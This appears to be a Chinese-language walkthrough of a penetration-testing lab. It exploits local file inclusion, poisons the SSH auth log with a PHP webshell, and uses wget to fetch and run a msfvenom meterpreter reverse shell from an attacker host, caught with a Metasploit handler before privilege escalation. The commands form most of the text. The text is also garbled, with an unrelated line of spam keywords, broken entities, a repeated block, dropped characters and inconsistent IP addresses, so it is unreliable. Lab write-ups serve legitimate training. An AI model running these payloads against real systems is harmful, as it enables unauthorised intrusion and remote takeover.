搜不到wordpress 网站,网站开发职位描述,中国建设银行网站外汇,装修平台网站排名主机发现
arp-scan -l 得到靶机ip
192.168.229.152
端口扫描
nmap -sV -A -T4 192.168.1.20
这段代码使用 nmap 命令来扫描目标主机 192.168.1.20#xff0c;并执行以下操作#xff1a;-sV#xff1a;探测开放的端口#xff0c;以确定服务/版本信息。-A#xff1a;启…主机发现
arp-scan -l 得到靶机ip
192.168.229.152
端口扫描
nmap -sV -A -T4 192.168.1.20
这段代码使用 nmap 命令来扫描目标主机 192.168.1.20并执行以下操作-sV探测开放的端口以确定服务/版本信息。-A启用操作系统探测、版本探测、脚本扫描和跟踪路由。-T4设置时间模板用于平衡速度和准确性。当运行这段代码时nmap 将扫描目标主机并尝试确定开放的端口及其对应的服务和版本信息。它还会执行一些额外的操作如操作系统探测和跟踪路由。输出结果将显示目标主机的详细信息包括开放的端口、服务、版本等。 发现80和22端口是开放的分别是ssh和http服务
服务网站
http://192.168.229.152/ 存在本地文件包含找到一个邮箱可能有用
http://192.168.229.152/index.php?fileabout.php 漏洞利用
下载 LFI-JHADDIX.txt字典
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
burpsuite抓包 发送intuder爆破 复制url访问页面 没什么有用的信息
http://192.168.229.152/index.php?file%2fvar%2flog%2flastlog 没什么有用的信息
http://192.168.229.152/index.php?file%2fvar%2frun%2futmp 此处存在url跳转注意一下
http://192.168.229.152/index.php?file%2fvar%2flog%2fauth%2elog 下面包含其他文件的结果
http://192.168.229.152/index.php?file/etc/passwd
查看history curl -is 192.168.229.152/index.php?file/var/log/auth.og 之后的步骤建议在此处打快照
ssh root192.168.229.152 此处输错密码会有错误日志存储所以可以尝试注入 注入后发现用户名被隐藏
ssh ?php system($_GET[cmd]);?192.168.229.152 msf监听
写入一句话木马
curl -is http://192.168.229.152/index.php?file/var/log/auth.logcmdls msf生成木马
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST192.168.229.141 LPORT 将生成的木马放入本机免杀盘在文件处开启http服务
python -m http.server 通过浏览器上传一句话木马
http://192.168.229.152/index.php?filevar/log/auth.logd1nosystem(%27wget192.168.110.17:7878/shell.elf%27)%3b
http://192.168.229.152/index.php?file/var/log/auth.logd1nosystem(%27chmod%2bxshell.elf%27)%3b
?file/var/log/auth.logd1nosystem(./shell.elf)%3b
kali开启监听
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 5757
set lhost 192.168.229.141
run
监听成功 进入交互式shell
python -c import pty;pty.spawn(/bin/bash)
查看免密操作
sudo -l
sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami